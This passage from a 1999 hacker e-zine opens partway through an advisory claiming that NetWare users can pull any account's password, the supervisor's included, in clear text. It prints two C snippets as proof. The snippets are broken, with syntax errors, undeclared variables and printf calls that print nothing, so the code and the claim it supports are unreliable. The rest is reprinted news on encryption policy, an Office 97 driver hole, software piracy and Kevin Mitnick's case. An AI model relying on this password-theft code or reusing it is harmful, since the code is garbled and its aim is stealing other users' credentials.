  6936.       static or dynamic, and whether it is an item or a set.  Sets are lists of object IDs which are
  6937.       interpreted by NetWare.  Item properties are unformatted binary fields stored in 128-byte
  6938.       segments which are interpreted by applications or NetWare APIs.
  6939.               Any user can retrieve the 128-byte segment which represents an object's password, and
  6940.       then convert this binary string into clear text.  The user first calls GetObjectData() to get the
  6941.       name of the object.  This function uses ScanBinderyObject() to populate a structure of type
  6942.       OBJECT.  There are two ways of identifying objects.  You can use the OBJECT ID or the
  6943.       OBJECT NAME and OBJECT TYPE.  The last element is a dummy with all fields cleared to
  6944.       0.  Here the user calls GetUserAndApplicationData() to retrieve the password.  For example:
  6945.       
  6946.       ...
  6947.       
  6948.       GLOBAL int GetUserAndAppInfo(char *argv[], int nMaxArgs, OBJECT *pObject)
  6949.       {
  6950.       
  6951.         strcpy(aop->obj.szObjectName, argv[nMaxArgs - 2])'
  6952.         aop->obj.wObjectType = OT_APPLICATION;
  6953.         strcpy(aop->szPassword, argv[nMaxArgs - 1]);
  6954.         fread(&szPassword, sizeof(int), 1, inpf);
  6955.         printf("\nThe password for that account is ", szPassword, "\n");
  6956.       }
  6957.       
  6958.               The second thing I want to discuss is the retrieval of the password for the account that
  6959.       you're on.  To do this we use  functions in the Connection Services.  So we can call
  6960.       GetConnectionNumber() to get the number that the file server has assigned to this workstation's
  6961.       connection.  Then we call GetConnInfo() to get the name of the user among other information
  6962.       including the password.  Take a look:
  6963.       
  6964.       ...
  6965.       
  6966.       void GetMyAccountPassword(char *argv[], int nMaxArgs, OBJECT *pObject)
  6967.       {
  6968.         FS_CONNECTION_INFO *pFSConnInfo;
  6969.       
  6970.         pFSConnInfo = GetConnInfo(GetConnectionNumber());
  6971.       
  6972.         if (pFSConnInfo == NULL)
  6973.         return -1;
  6974.       
  6975.         /* this is where the user info is now */
  6976.       
  6977.         *pObject = pFSConnInfo->fsLoggedObject.obj;
  6978.         free9pFSConnInfo);
  6979.         strcpy(aop->obj.szObjectName, argv[nMaxArgs - 2]);
  6980.         aop->obj.wObjectType = OT_APPLICATION;
  6981.         strcpy(aop->szPassword, argv[nMaxArgs -1]);
  6982.         fread(&szPassword, sizeof(int), 1, inpf);
  6983.       
  6984.         printf("\nThe password for the account you're on is ", szPassword, "\n");
  6985.       
  6986.       }
  6987.       
  6988.       
  6989.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  6990.       
  6991.       4 - Impact
  6992.       
  6993.               Wow.  I shouldn't even have to go over this section.  If your network is running NetWare
  6994.       and you have private data of any sort on the network, your data is succeptible to the will of the
  6995.       attacker.  The severity of this attack is only as big as the system that is affected.  A hacker may
  6996.       decide to get the password to the supervisor account if the supervisor is logged in.  If that
  6997.       happens, the hacker will have complete control of every computer on the NetWare network. 
  6998.       The hacker may decide to change or delete your data, or nothing at all.
  6999.       
  7000.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  7001.       
  7002.       5 - What to do about it
  7003.       
  7004.               There is actually nothing that any of us can do about this right now.  We can't deny people
  7005.       access to the NetWare bindery or monitor their queries of it.  The best thing to do right now is
  7006.       to switch to something more secure until the problem is fixed in a later version of NetWare.  It
  7007.       would be wise to presume that it works on all versions of NetWare.
  7008.       
  7009.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  7010.       
  7011.       Legions Interactive
  7012.       http://www.legions.org
  7013.       Keen Veracity
  7014.       http://www.underzine.com
  7015.       RootFest 2K
  7016.       http://www.rootfest.org
  7017.       
  7018.       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  7019.       
  7020.       @HWA           
  7021.       
  7022. 45.0 Tax Break for Key Escrow Crypto 
  7023.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  7024.      
  7025.      From HNN http://www.hackernews.com/
  7026.  
  7027.       contributed by Code Kid 
  7028.       H.R. 2617, a bill sponsored by Porter Goss (R-Florida),
  7029.       seeks to amend the Internal Revenue Code of 1986 to
  7030.       allow a tax credit for development costs of encryption
  7031.       products with plain text capability without the user's
  7032.       knowledge. This will give companies a great monetary
  7033.       incentive to create weak crypto. (It will also allow
  7034.       people to find out what publicly traded companies took
  7035.       advantage of this tax break, so you will know which
  7036.       products to avoid.) 
  7037.  
  7038.       The Federal Register
  7039.       http://thomas.loc.gov/cgi-bin/query/D?r106:1:./temp/~r106TNpQz3:e0:
  7040.       <link expired, couldn't locate a follow up...>
  7041.       
  7042.       Wired
  7043.       http://www.wired.com/news/news/politics/story/21014.html
  7044.       
  7045.       A Tax Break for Snoopable Code
  7046.       by Declan McCullagh 
  7047.  
  7048.       3:00 a.m.  30.Jul.99.PDT
  7049.       WASHINGTON -- If anyone in Washington
  7050.       qualifies as an ardent foe of encryption,
  7051.       it's congressman Porter Goss (R-Florida). 
  7052.  
  7053.       Two years ago, the chairman of the
  7054.       House Intelligence committee tried to
  7055.       make it a crime to distribute
  7056.       privacy-protecting software, such as PGP
  7057.       or recent versions of Netscape Navigator
  7058.       and Internet Explorer. 
  7059.  
  7060.       The plan failed, but Goss didn't give up.
  7061.       On Wednesday, he and the panel's
  7062.       ranking Democrat introduced a bill to
  7063.       jump-start the US market for encryption
  7064.       products with backdoors that would
  7065.       support government surveillance. 
  7066.  
  7067.       The "Tax Relief for Responsible Encryption
  7068.       Act" gives companies a 15 percent tax
  7069.       break on the costs of developing
  7070.       government-snoopable encryption
  7071.       products. 
  7072.  
  7073.       Such products might support key
  7074.       recovery -- in which a copy of the secret
  7075.       key needed to unlock scrambled data is
  7076.       placed within reach of law enforcement
  7077.       -- or "other techniques." 
  7078.  
  7079.       "This legislation offers a way out of the
  7080.       stalemate between those who view
  7081.       commerce and national security as an
  7082.       'either-or' proposition," Goss said in a
  7083.       statement. 
  7084.  
  7085.       Goss and 22 other House members also
  7086.       sent a letter to President Clinton asking
  7087.       him to organize a "summit" of industry
  7088.       executives and government officials to
  7089.       extract an agreement on encryption
  7090.       regulation. 
  7091.  
  7092.       "It has become evident that your
  7093.       leadership on this issue is vital to resolve
  7094.       the equally legitimate interests of law
  7095.       enforcement, national security, privacy,
  7096.       and industry.... We believe that without
  7097.       your personal involvement on this issue
  7098.       now, our national security and public
  7099.       safety will suffer serious and needless
  7100.       consequences," the legislators said. 
  7101.  
  7102.       Law enforcement groups and their allies in
  7103.       the Clinton administration have long
  7104.       pressed for snoopable encryption
  7105.       products, complaining that a parade of
  7106.       undesirables -- such as pedophiles, drug
  7107.       smugglers, and money launderers -- might
  7108.       use crypto to communicate in secret. 
  7109.  
  7110.       But the idea of the government
  7111.       subsidizing potential privacy invasions
  7112.       doesn't appear to be wildly popular. 
  7113.  
  7114.       "I think the government's role is to
  7115.       protect the individual liberties of its
  7116.       citizens -- they should be giving
  7117.       companies incentives to strengthen
  7118.       encryption," said Jennifer DePalma, a
  7119.       graduate fellow at the Institute for
  7120.       Humane Studies at George Mason
  7121.       University in Arlington, Virginia. 
  7122.  
  7123.       "They should let the free market continue
  7124.       to put an emphasis on protecting people's
  7125.       privacy," she said. 
  7126.  
  7127.       For its part, the House Permanent Select
  7128.       Committee on Intelligence is insisting that
  7129.       it's pushing a voluntary approach. 
  7130.  
  7131.       The committee members have abandoned
  7132.       their hope for a ban on unapproved
  7133.       encryption software, a source said. The
  7134.       administration has pushed for a key
  7135.       recovery scheme, whereby law
  7136.       enforcement would gain access to
  7137.       "plaintext," or unencrypted, information. 
  7138.  
  7139.       But the market has rejected such
  7140.       options. 
  7141.  
  7142.       "Mandatory recoverability is a
  7143.       nonstarter," a committee staff member
  7144.       said. "Law enforcement doesn't need us
  7145.       to mandate access to plaintext
  7146.       domestically." 
  7147.  
  7148.       "The congressman does not want to
  7149.       mandate recovery of encryption
  7150.       products. He wants to encourage
  7151.       products that have societal benefits," a
  7152.       spokesman for Goss said. 
  7153.  
  7154.       The committee last week said in a report
  7155.       that a bill to roll back some export
  7156.       restrictions on encryption products would
  7157.       harm children while protecting "criminals
  7158.       and international thugs." 
  7159.  
  7160.       "Child pornographers could distribute their
  7161.       filth unimpeded," the report said. 
  7162.  
  7163.       "Pedophiles could secretly entice the
  7164.       children of America into their clutches.
  7165.       Drug traffickers will make their plans ...
  7166.       without the slightest concern that they
  7167.       will be detected. Terrorists and spies can
  7168.       cause unspeakable damage without even
  7169.       the possibility of being stopped before it
  7170.       is too late." 
  7171.  
  7172.       Rep. Julian C. Dixon (D-California) is
  7173.       cosponsoring the measure, HR 2616. 
  7174.       
  7175.       @HWA
  7176.  
  7177. 46.0 NSA Claims Israel Attacking US 
  7178.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7179.  
  7180.      From HNN http://www.hackernews.com/
  7181.  
  7182.       contributed by Turtlex 
  7183.       Evidently there are not enough government computer
  7184.       security agencies. The NSA's new National Security
  7185.       Incident Response Center issued a warning last week
  7186.       regarding attacks originating from a machine inside
  7187.       Israel. The 'attacks' appeared to be numerous port
  7188.       scans of government and military computers. (Love the
  7189.       acronym NS-IRC, hehehe.) 
  7190.  
  7191.       The Washington Times 
  7192.       http://www.washtimes.com/news/news3.html
  7193.       
  7194.       White House says IPI
  7195.       system not aimed at U.S.
  7196.  
  7197.       By Ben Barber
  7198.       THE WASHINGTON TIMES
  7199.  
  7200.            White House spokesman David Leavy
  7201.             on Thursday adamantly denied a new
  7202.             International Public Information (IPI)
  7203.       system would be directed at American
  7204.       audiences.
  7205.            IPI is a secret Clinton administration
  7206.       program to control public information
  7207.       disseminated by the departments of State and
  7208.       Defense and intelligence agencies.
  7209.            It is meant to "influence foreign audiences
  7210.       in a way favorable to the achievement of U.S.
  7211.       foreign-policy objectives," according to a draft
  7212.       IPI charter obtained by The Washington
  7213.       Times.
  7214.            But critics claim that IPI will be used for
  7215.       domestic propaganda.
  7216.       
  7217.      White House says information
  7218.      system not aimed at U.S.
  7219.  
  7220.      By Ben Barber
  7221.      THE WASHINGTON TIMES <cont'd>
  7222.  
  7223.            White House spokesman David Leavy on Thursday
  7224.            adamantly denied a new International Public Information
  7225.            (IPI) system would be directed at American audiences.
  7226.           IPI is a secret Clinton administration program to control
  7227.      public information disseminated by the departments of State and
  7228.      Defense and intelligence agencies.
  7229.           It is meant to "influence foreign audiences in a way favorable
  7230.      to the achievement of U.S. foreign-policy objectives," according
  7231.      to a draft IPI charter obtained by The Washington Times.
  7232.           But critics claim that IPI will be used for domestic
  7233.      propaganda. 
  7234.                  -- Continued from Front Page -- 
  7235.  
  7236.           "That is totally inaccurate," Mr. Leavy said. "The IPI
  7237.      initiative is designed to better organize the government and the
  7238.      instruments we have to support our public diplomacy, military
  7239.      activities and economic engagement overseas. There is no
  7240.      impact on the domestic press."
  7241.           Mr. Leavy said that U.S. information officials at home and
  7242.      abroad serve different functions.
  7243.           "There are officers who work with the media in the United
  7244.      States and officers who support the U.S. policy overseas. They
  7245.      are totally separate. They are totally different functions," Mr.
  7246.      Leavy said.
  7247.           But a former deputy chief of the U.S. Information Agency
  7248.      (USIA) under three presidents said he fears the IPI plan would
  7249.      mean U.S. propaganda aimed at foreigners would be used to
  7250.      influence American elections.
  7251.           Gene Kopp, who served under Presidents Nixon, Ford and
  7252.      Bush, said the elections of President Kennedy and President
  7253.      Carter were directly influenced by leaks of USIA foreign
  7254.      public-opinion polls showing a decline in U.S. prestige abroad.
  7255.           "I am concerned this could happen again under the IPI plan,"
  7256.      said Mr. Kopp, currently a Washington lawyer. "The
  7257.      administration is transferring all assets, except broadcasting, to
  7258.      State, where they will not be separated in any way. It will be
  7259.      very difficult to separate what is disseminated in the United
  7260.      States and overseas."
  7261.           He said that the opportunity for abusing the system will be
  7262.      great.
  7263.           "The temptation to spin this stuff in a partisan way will be
  7264.      very strong -- probably irresistible," he said. "The other ominous
  7265.      feature is that this includes the intelligence agencies. They are in
  7266.      the business of misinformation. God only knows where that
  7267.      goes."
  7268.           New allegations emerged Thursday that the Clinton
  7269.      administration has been trying to control how American news
  7270.      organizations cover foreign affairs, at least since the Bosnia
  7271.      peacekeeping mission in 1996.
  7272.           According to a former government official, who insisted on
  7273.      anonymity, the White House created a Strategic Planning
  7274.      Directorate, which used the State Department and USIA to
  7275.      pressure American reporters into favorable coverage of the U.S.
  7276.      troop deployment in Bosnia-Herzegovina.
  7277.           It came into being just prior to the 1996 presidential election.
  7278.           "I heard them talk about it in conference telephone calls
  7279.      --how they had to control the media out there, the bureau chiefs,
  7280.      because if the Republicans picked this up [the Clinton
  7281.      administration] would be exposed as having no foreign policy,"
  7282.      said the former government official.
  7283.           Shortly after President Clinton won re-election in 1996, the
  7284.      administration announced that U.S. troops would not be home by
  7285.      Christmas, as promised. Today, nearly three years later, some
  7286.      7,000 U.S. troops remain in Bosnia.
  7287.           "The U.S. public wanted to know how long American troops
  7288.      had to be there," said the ex-official. "The Clinton people said
  7289.      'only one year,' and [that] they would be home in December,
  7290.      after the election. But everyone knew the only way to keep the
  7291.      warring sides apart was robust international and American
  7292.      presence."
  7293.           This former official said this was widely discussed.
  7294.           "In the conference calls, they openly discussed how they had
  7295.      to prevent American journalists from discussing this," he said.
  7296.           The source said that USIA officials and National Security
  7297.      Adviser Samuel R. Berger tried to convince American editors
  7298.      not to publish accounts by their reporters who wrote that Bosnia
  7299.      was unsafe for Americans, that Muslim extremists were a
  7300.      threat, and that the warring sides would never be pacified.
  7301.           Ivo Daalder, who was a staffer on the National Security
  7302.      Council at the time, said discussions had no ulterior motives.
  7303.           Mr. Daalder, who is now at the Brookings Institution, said the
  7304.      talks among the USIA, National Security Council and other
  7305.      agencies "had the sole purpose of making sure they share
  7306.      information among them, and when the U.S. government speaks
  7307.      to the outside world, it does so in a coordinated manner."
  7308.           Mr. Daalder said "there was no deliberate campaign
  7309.      designed to put out false information prior to the 1996
  7310.      presidential election."
  7311.           He said that USIA did increase staffing and efforts to
  7312.      convince American reporters in Bosnia of the administration's
  7313.      perspective in September, prior to the Bosnian elections.
  7314.  
  7315.      @HWA
  7316.       
  7317.  
  7318. 47.0 Jail Time for Users of Crypto 
  7319.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7320.       
  7321.      From HNN http://www.hackernews.com/
  7322.      
  7323.       contributed by Code Kid 
  7324.       The Electronic Communications Bill, proposed in Britain,
  7325.       could send users of encryption products to jail for up to
  7326.       two years. Basically if you send encrypted mail to
  7327.       someone who is being investigated by the police the
  7328.       police can ask you for your keys. If you refuse you
  7329.       could get up to two years in jail. Tip off the person who
  7330.       received the encrypted message and get five years. 
  7331.  
  7332.       CNN
  7333.       http://www.cnn.com/TECH/computing/9907/29/ukencrypt.idg/index.html
  7334.       
  7335.       Use encryption, go to jail? 
  7336.  
  7337.       July 29, 1999
  7338.       Web posted at: 11:11 a.m. EDT (1511 GMT)
  7339.  
  7340.       by Douglas F. Gray 
  7341.  
  7342.       LONDON (IDG) -- Encryption users
  7343.       could face up to two years in prison
  7344.       for refusing to hand over the keys to
  7345.       their code, according to Britain's
  7346.       proposed Electronic Communications
  7347.       Bill. 
  7348.  
  7349.       The bill is causing concern among
  7350.       privacy advocates and opposition
  7351.       parties, who say the bill gives law
  7352.       enforcement wide-reaching power
  7353.       over private Internet communications.
  7354.  
  7355.       Most aggravating, the bill calls for a
  7356.       possible two years in prison for
  7357.       anyone refusing to turn over the
  7358.       encryption key or the message in
  7359.       plain text to law-enforcement
  7360.       officials. It also calls for a five-year
  7361.       prison term for tipping off senders
  7362.       that they are being investigated,
  7363.       according to Caspar Bowden,
  7364.       director of the London-based
  7365.       Foundation for Information Policy
  7366.       Research. 
  7367.  
  7368.       Even discussing an investigation in public, such as complaining about alleged
  7369.       abuses of law enforcement to the media, may also be punishable by
  7370.       imprisonment, said Bowden. "Let's say that someone under investigation sends
  7371.       me a message with encryption that can only be decrypted by the receiver. The
  7372.       authorities come to me and tell me that they are investigating someone, but
  7373.       won't tell me who, so they ask for all my private keys," Bowden said. Refusing
  7374.       this request from the authorities could get him two years in prison, said
  7375.       Bowden. 
  7376.  
  7377.       In such a case, the authorities would have all of Bowden's private keys,
  7378.       enabling law enforcement to read all encrypted correspondence that was sent
  7379.       to him. Bowden would then have no choice, he said, because by informing
  7380.       anyone of this, and asking them to change their key, he would break the
  7381.       "tipping off" clause of the bill and in turn and face five years imprisonment. 
  7382.  
  7383.       "I can't complain to the newspaper, otherwise
  7384.       it's five years in jail. All I can do is go to a
  7385.       secret tribunal," Bowden said. He's not joking:
  7386.       The tribunal is five judges, only two have to
  7387.       participate, and only one has to lay the
  7388.       groundwork, he added. 
  7389.  
  7390.       Bowden feels that the entire bill needs to be
  7391.       re-examined by the U.K.'s Department of
  7392.       Trade and Industry. "We would like to see the
  7393.       Electronic Communication Bill be about
  7394.       e-commerce, which is what they said; the
  7395.       law-enforcement section doesn't even belong
  7396.       in it," he added. 
  7397.  
  7398.       There is also another method of hiding
  7399.       messages, called steganography. It's not really
  7400.       clear to commentators such as Bowden
  7401.       whether or not steganography is covered by
  7402.       the bill. With steganography, users can
  7403.       "sprinkle an encrypted message" into a
  7404.       photographic format, such as JPEG, or a
  7405.       music format such as MP3, both of which are very popular online. In actuality,
  7406.       the message does not necessarily need to be encrypted, just concealed within
  7407.       the file, according to Bowden. 
  7408.  
  7409.       Although the bill does not mention technologies such as steganography,
  7410.       Bowden speculated that the authorities could enforce regulations in those
  7411.       cases by proving that there was a reason to search, such as the existence of a
  7412.       steganography program on the suspect's computer. 
  7413.  
  7414.                    Douglas F. Gray writes for the IDG News Service.
  7415.                    
  7416.       @HWA                   
  7417.  
  7418. 48.0 Office97 Users Ripe for the Picking 
  7419.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  7420.  
  7421.       From HNN http://www.hackernews.com/
  7422.  
  7423.  
  7424.       contributed by Space Rogue 
  7425.       A hole in the Jet 3.51 driver (ODBCJT32.DLL) leaves
  7426.       users vulnerable to attack. Such an attack would leave
  7427.       the system in such a state that the attacker could
  7428.       execute shell commands and give full control over your
  7429.       machine to the bad guy. Microsoft has verified the
  7430.       problem and is working on a security bulletin, in the
  7431.       mean time they recommend users upgrade to Jet 4.0. 
  7432.  
  7433.       MSNBC
  7434.       http://www.msnbc.com/news/295385.asp
  7435.       
  7436.       Hole opens Office 97 users to hijack
  7437.       Vulnerability in popular Microsoft suite could allow malicious coder
  7438.       to take control of computers without victim knowing
  7439.                                                          By Mark Stevenson
  7440.                                                                      MSNBC
  7441.  
  7442.       July 30 ù A vulnerability in Microsoft Office 97 can
  7443.       allow malicious code contained in an Excel 97
  7444.       worksheet hidden in a Web page or sent in e-mail
  7445.       to take control of online computers without the
  7446.       victimsÆ being aware, Microsoft confirmed
  7447.       Thursday evening
  7448.  
  7449.      THE VULNERABILITY IS CONTAINED in the Jet
  7450.      3.51 driver (ODBCJT32.DLL) that was shipped with the
  7451.      popular Office 97 software suite.
  7452.             (Microsoft is a partner in MSNBC.)
  7453.             Juan Carlos G. Cuartango, a Spanish Web developer
  7454.      who has discovered other important security holes, reported
  7455.      the problem to the NTBugTraq mailing list Thursday
  7456.      afternoon. Later Thursday, the Microsoft Security Team
  7457.      confirmed the bug in a posting to the same list.
  7458.             ôIf you open a malicious Excel worksheet implementing
  7459.      this vulnerability it will send shell commands to your operating
  7460.      system (Windows NT, 95 and 98 are all affected) that can:
  7461.      (infect) you (with) a virus, delete your disks, read your files,ö
  7462.      Cuartango said in his posting to the list. ôà(T)he worksheet
  7463.      will get full control over your machine.ö
  7464.             The Microsoft posting said the company is preparing to
  7465.      release a security bulletin dealing with the vulnerability.
  7466.      Shortly before 5 a.m. ET Friday, the bulletin had not
  7467.      appeared on the Microsoft Office Update site or the
  7468.      Microsoft security site.
  7469.             ôWeÆve verified that this vulnerability in Jet 3.51 does
  7470.      exist, and urge all customers who are using Jet 3.51 to
  7471.      upgrade to Jet 4.0,ö the Microsoft mail to NtBugTraq said.
  7472.      ôThis vulnerability should be taken seriously. Office 97 users
  7473.      in particular should consider immediately upgrading their
  7474.      database driver to Jet 4.0, as Jet 3.51 is installed by default in
  7475.      Office 97. Office 2000 users do not need to upgrade, as
  7476.      Office 2000 installs Jet 4.0 by default.ö 
  7477.  
  7478.             An Excel worksheet that contains code to take
  7479.      advantage of the vulnerability could be hidden in a frame on a
  7480.      Web page or sent in an e-mail. As long as the worksheet
  7481.      contained no macros, there would be no indication to the user
  7482.      who visited the Web page or opened the e-mail that any code
  7483.      had been executed, Cuartango reported. If the file is sent in
  7484.      e-mail, the recipient must be on-line to be affected,
  7485.      Cuartango said. He recommended not opening documents
  7486.      you are not expecting to receive and going off-line before
  7487.      opening e-mail.
  7488.             If the worksheet were instead sent as an attachment to
  7489.      e-mail, the recipient could avoid ill effects by not opening the
  7490.      attachment. 
  7491.  
  7492.       @HWA
  7493.  
  7494.       
  7495.       
  7496.  
  7497. 49.0 China Sends Pirate to Jail 
  7498.      ~~~~~~~~~~~~~~~~~~~~~~~~~~  
  7499.  
  7500.      From HNN http://www.hackernews.com/
  7501.  
  7502.       contributed by Code Kid 
  7503.       In what is believed to be the first jail sentence for
  7504.       piracy in China, a man has been sentenced to four years
  7505.       in jail and fined US $2,400. The name of the company or
  7506.       the software was not mentioned. 
  7507.  
  7508.       Wired
  7509.       http://www.wired.com/news/news/politics/story/21003.html
  7510.       
  7511.     
  7512.      China Jails a Software Pirate
  7513.      Reuters 
  7514.  
  7515.      2:45 p.m.  29.Jul.99.PDT
  7516.      BEIJING -- China has sentenced a man to
  7517.      four years in jail in what is believed to be
  7518.      the country's first criminal case involving
  7519.      software piracy, state media reported
  7520.      Thursday. 
  7521.  
  7522.      A court in the eastern city of Hangzhou
  7523.      fined and sentenced Wang Antao for
  7524.      selling a slightly modified version of a
  7525.      company's software without permission,
  7526.      the China Daily said. 
  7527.  
  7528.      Wang would have to pay 20,000 yuan
  7529.      (US$2,400) in fines and 280,000
  7530.      ($33,800) in compensation to the
  7531.      company, which was not identified. 
  7532.  
  7533.      The newspaper said it was the first such
  7534.      case in China, which has struggled to
  7535.      combat rampant piracy, fearing it will
  7536.      impede the growth of its nascent
  7537.      software industry. 
  7538.  
  7539.      A study released this month by the US
  7540.      Business Software Alliance and Software
  7541.      & Information Industry Association found
  7542.      that 95 percent of China's newly installed
  7543.      business software in 1998 was pirated. 
  7544.  
  7545.      Software piracy cost China $1.2 billion in
  7546.      1998 -- more than in any other Asian
  7547.      nation, according to the report.   
  7548.       
  7549.      @HWA 
  7550.      
  7551. 50.0 MITNICK: FEDERAL GOVERNMENT MANIPULATED THE FACTS
  7552.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  7553.      From http://www.net-security.org/
  7554.      
  7555.      by Thejian, Saturday 31st July 1999 on 7:00 pm CET
  7556.      Did the US government manipulate the facts on the subject of Kevin Mitnick? He and
  7557.      his attorneys say so and are asking a federal judge to unseal a court filing that they
  7558.      claim proves this. Full story below. 
  7559.      
  7560.      http://www.zdnet.com/zdnn/stories/news/0,4586,2306704,00.html     
  7561.      
  7562.       --------------------------------------------------------------
  7563.       This story was printed from ZDNN,
  7564.       located at http://www.zdnet.com/zdnn.
  7565.       --------------------------------------------------------------
  7566.       
  7567.       Mitnick: 'I was never a malicious person'
  7568.       By Kevin Poulsen, ZDNN
  7569.       July 30, 1999 4:36 PM PT
  7570.       URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2306704,00.html?chkpt=zdnnstop
  7571.       
  7572.       Kevin Mitnick and his attorneys are asking a federal judge to unseal a court filing that they claim
  7573.       proves the government was guilty of misconduct while building its case against the hacker. The
  7574.       goal, says Mitnick in a rare interview, is to clear his name. 
  7575.       
  7576.       "At the beginning of this case the federal government manipulated the facts to allege losses that
  7577.       were grossly inflated," Mitnick said in a telephone interview Thursday night from the Los Angeles
  7578.       Metropolitan Detention Center. "Hopefully, if the court considers this motion and rules upon its
  7579.       merits, it will clear me publicly of the allegations that I caused these significant losses." 
  7580.       
  7581.       The motion, filed by defense attorney Don Randolph on July 22, is the latest conflict in a case
  7582.       that's remained unusually acrimonious, considering that both sides reached a plea settlement in
  7583.       March. Under the terms of the agreement, Mitnick pleaded guilty to seven felonies and admitted
  7584.       to penetrating computers at such companies as Motorola (NYSE:MOT), Fujitsu and Sun
  7585.       Microsystems, (Nasdaq:SUNW) and downloading proprietary source code. On Aug. 9, he's
  7586.       expected to be sentenced to 46 months in prison, on top of the 22 months he received for cell
  7587.       phone cloning and an earlier supervised release violation. 
  7588.       
  7589.       Mitnick vexed by 'snowball effect'
  7590.       The only sentencing issue left unresolved is the amount of money Mitnick will owe his victims. 
  7591.       
  7592.       Prosecutors are seeking $1.5 million in restitution -- a modest figure compared to the more than
  7593.       $80 million the government quoted to an appeals court last year, when it successfully fought to
  7594.       hold the hacker without bail. That figure, though no longer promulgated by
  7595.       prosecutors, vexes Mitnick, who sees a "snowball effect" of bad press that
  7596.       began with a 1994 front-page article in the New York Times. 
  7597.       
  7598.       "Because of this assault that was made upon me by John Markoff of the New
  7599.       York Times, then the federal government grossly exaggerating the losses in
  7600.       the case and the damages I caused, I have a desire to clear my name,"
  7601.       Mitnick said. "The truth of the matter is that I was never a malicious person. I
  7602.       admit I was mischievous, but not malicious in any sense." 
  7603.       
  7604.       Markoff reported on Mitnick for the New York Times, and went on to
  7605.       co-author Tsutomu Shimomura's book, "Takedown: The Pursuit and Capture
  7606.       of America's Most Wanted Computer Outlaw -- By The Man Who Did It,"
  7607.       slated as an upcoming movie from Miramax. Markoff's portrayal of Mitnick,
  7608.       and the profit it ultimately earned him, has been the subject of some criticism from Mitnick's
  7609.       supporters, and raised eyebrows with a handful of journalists. 
  7610.       
  7611.       Markoff's most enduring Mitnick anecdote is the story that the hacker cracked NORAD in the
  7612.       early 1980s, a claim that was recycled as recently as last May by another New York Times
  7613.       reporter. "I never even attempted to access their computer, let alone break into it," Mitnick said.
  7614.       "Nor did I do a host of allegations that he says I'm guilty of." 
  7615.       
  7616.       For his part, Markoff says of the NORAD story: "I had a source who was a friend of Kevin's who
  7617.       told me that. I was not the first person to report it, nor the only person to report it." 
  7618.       
  7619.       Government collusion?
  7620.       The July 22 motion filed by Mitnick's attorney accuses the government of coaching victim
  7621.       companies on how to artificially inflate their losses. The filing is based on documents Randolph
  7622.       subpoenaed from Sun, which show that shortly after Mitnick's February 1995 arrest, the FBI
  7623.       specifically instructed Sun to calculate its losses as "the value of the source code" Mitnick
  7624.       downloaded, and to keep the figure "realistic." 
  7625.       
  7626.       Following the FBI's advice, Sun estimated $80 million in losses based on the amount they paid to
  7627.       license the Unix operating system. Six other companies responded, using software development
  7628.       costs as the primary calculus of loss. The total bill came to $299,927,389.61, significantly more
  7629.       than the $1.5 million the government says Mitnick inflicted in repair and monitoring costs, and theft
  7630.       of services and the $5 million to $10 million both sides stipulated to for purposes of sentencing. 
  7631.       
  7632.       "At the beginning of this litigation, the government misrepresented to the federal judiciary, the
  7633.       public and the media the losses that occurred in my case," Mitnick said. 
  7634.       
  7635.       To Randolph, it all smacks of collusion. "What comes out from the e-mails that we have, is that the
  7636.       so-called loss figures solicited by the government were research and development costs at best,
  7637.       fantasy at worst," he said. "I would classify it as government manipulation of the evidence." 
  7638.       
  7639.       However, prosecutor David Schindler dismissed Randolph's claims as "silly and preposterous." 
  7640.       
  7641.       "What would be inappropriate is to tell them what dollar amount to arrive at. In terms of the
  7642.       methodology, in terms of what is to be included in loss amounts, that direction is something we
  7643.       often provide because we're aware of what components are allowable under law, and which
  7644.       components are not," he said. 
  7645.       
  7646.       Schindler said development costs are a valid indicator of victim loss, but acknowledges that
  7647.       putting a dollar figure on software can be difficult. 
  7648.       
  7649.       Mitnick claims cover-up
  7650.       Mitnick and his attorney both say there's more to the story, but they can't talk about it. At
  7651.       Mitnick's last court appearance on July 12, the judge granted a government request that any filings
  7652.       relating to victim loss be sealed from the public. 
  7653.       
  7654.       "As much as the government would like to, you can't take the recipe for ice and file it under seal
  7655.       and have it become confidential," said Mitnick, who, along with his attorney, is challenging the
  7656.       confidentiality of the loss information, and asking for the motion to be unsealed. 
  7657.       
  7658.       Mitnick claims he smells a cover-up. "The government should not be permitted to bury the truth of
  7659.       the case from the public and the media by seeking and obtaining a protective order to essentially
  7660.       force me to enter a code of silence," he said. 
  7661.       
  7662.       "Our only concern, as it has been from day one, is the protection of the victims of Mitnick's
  7663.       crimes," prosecutor Schindler said. "Why Mitnick and his lawyers want to continue to harass,
  7664.       embarrass and abuse them remains a mystery to us, but it's something that we will continue to
  7665.       oppose vigorously." 
  7666.       
  7667.       Although the software costs are no longer being used against his client, Randolph claimed that by
  7668.       "manipulating the loss figures," the government raises the issue of whether even the more modest
  7669.       $1.5 million calculation is accurate. In the sealed motion, he's seeking an evidentiary hearing to
  7670.       explore the matter, and asking that Mitnick be released on a signature bond pending that hearing. 
  7671.       
  7672.       And if Mitnick winds up owing money anyway? "We're asking for sanctions that the government
  7673.       pay the restitution," Mitnick said, "and that the judge recommend that I be immediately designated
  7674.       to a halfway house for the government's misconduct in this case." 
  7675.       
  7676.       Excerpt of the Sun documents are available on the Free Kevin Web site, maintained by members
  7677.       of a tireless grass-roots movement that's protested the hacker's imprisonment for years. "I'd like to
  7678.       sincerely thank all my friends and supporters for all the support they've given me over this long
  7679.       period of time," Mitnick said. "I'd like to thank them from my heart." 
  7680.       
  7681.       Kevin Poulsen writes a weekly column for ZDTV's CyberCrime. 
  7682.        
  7683.       @HWA
  7684.       
  7685. 51.0 ISPS ACCUSE CHINA OF INFOWAR
  7686.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7687.      
  7688.      From http://www.net-security.org/
  7689.      
  7690.      by Thejian, Saturday 31st July 1999 on 1:30 am CET
  7691.      Two Canadian ISPs claim they've traced DoS attacks on their network back to
